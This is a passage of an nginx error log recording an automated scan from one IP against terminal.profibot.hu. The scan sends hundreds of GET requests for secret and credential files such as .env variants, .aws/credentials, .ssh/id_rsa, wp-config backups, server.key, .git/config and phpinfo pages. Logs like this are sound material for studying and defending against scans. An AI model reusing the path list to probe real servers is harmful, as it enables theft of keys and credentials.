"GET /storage/logs/laravel.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /composer.lock HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dump.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php5.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server-info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.php.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pi.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php.backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /aws-credentials.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /%c0 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/credentials.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/credentials/admin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.azure-pipelines.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.bitbucket-pipelines.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.bitbucket/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.boto HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.bzr/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.c9/metadata/environment/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.circleci/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.circleci/config.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.dockerignore HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env-db HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.bkp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:44 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.email HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.hidden HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.hide HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.mail HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.smtp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.swp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.testing HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.uat HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_aws HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_copy HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_private HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_secret HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.git/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.github/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.github/workflows/*.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.gitignore HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.gitlab-ci.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.gitlab-ci/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.gitlab/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.hg/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.htaccess HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.idea/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.next/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.npmrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.nuxt/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.output/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.pypirc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.remote HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.ssh/id_rsa HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:45 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.ssh/id_rsa.pub HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.svn/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.travis.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.vite/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.vscode/settings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.well-known/openid-configuration HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.well-known/security.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /07-accessing-data/begin/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /07-accessing-data/end/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /08-routing/begin/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /08-routing/end/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /09-managing-state/begin/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /09-managing-state/end/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /123.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /3-sequelize/final/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /31_structure_tests/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /?p=info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /?p=php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /?phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /?phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /?phpinfo=1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /?q=info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /__debug__ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /__debugbar HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /__tests__/test-become/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_astro/[chunk-name].[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_ignition/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/945-34f67d7c0866cf61b970.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/%5B...not-found%5D/page-63e952e68a371605.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/error.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/global-error.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/app/layout-a908fe02173ed4b1.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/framework-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/main-app-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app-a9fba37d935ce3f3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app-d1b5411bacd03f02.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app-d25b242610000153a081.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_next/static/chunks/webpack-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:46 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /a.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /acme-challenge/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /acme/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /acme_challenges/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /actions-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /actuator/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin-panel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /adminapp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /adminer.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /adminer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /administrator/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /adminphp.php' HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /agora/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /alpha/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /anaconda/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apache.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apache/i.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apache/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apache/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apache2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apc.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/.env.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 